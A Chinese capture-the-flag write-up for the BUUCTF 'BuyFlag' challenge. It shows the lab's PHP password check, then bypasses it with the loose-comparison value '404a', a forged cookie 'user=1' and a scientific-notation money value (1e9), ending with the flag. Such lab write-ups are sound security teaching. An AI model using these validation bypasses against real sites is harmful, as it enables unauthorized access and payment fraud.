BUUCTF靶场19 -- [极客大挑战 2019]BuyFlag

mind

BUUCTF靶场19 -- [极客大挑战 2019]BuyFlag

源码中发现有个pay.php
http://ba3024ac-f84c-425d-827f-6e52b1dee359.node4.buuoj.cn:81/pay.php

页面展示

[Plain Text] 纯文本查看 复制代码

FLAG
FLAG NEED YOUR 100000000 MONEY

ATTENTION
If you want to buy the FLAG:
You must be a student from CUIT!!!
You must be answer the correct password!!!

Only Cuit's students can buy the FLAG

源码中发现

[PHP] 纯文本查看 复制代码

<!--
        ~~~post money and password~~~
if (isset($_POST['password'])) {
        $password = $_POST['password'];
        if (is_numeric($password)) {
                echo "password can't be number</br>";
        }elseif ($password == 404) {
                echo "Password Right!</br>";
        }
}
-->

可知该网页需要检测post参数password，is_numeric()用于检测是否是数字或数字字符串，而下面又需参数与404相等，根据php的弱类型比较特性，弱类型比较时"12df"取前面的整数部分12，因此传入post参数404a即可绕过验证。

利用burpsuite传参需要先抓包，将其传至Repeater，将http请求方式该为post，并在文件头中加一行Content-Type: application/x-www-form-urlencoded，再在raw下添加需要上传的post参数即可

[PHP] 纯文本查看 复制代码

Cookie: user=1
Connection: close

password=404a&money=199999999

返回如下：

[Plain Text] 纯文本查看 复制代码

you are Cuiter
Password Right!
Nember lenth is too long

上传money=1000000000，提示数字长度太长。。。使用科学计数法1e9

[Plain Text] 纯文本查看 复制代码

you are CuiterPassword Right!
flag{a14bb861-6842-4dec-8d8f-1c07ff13a732}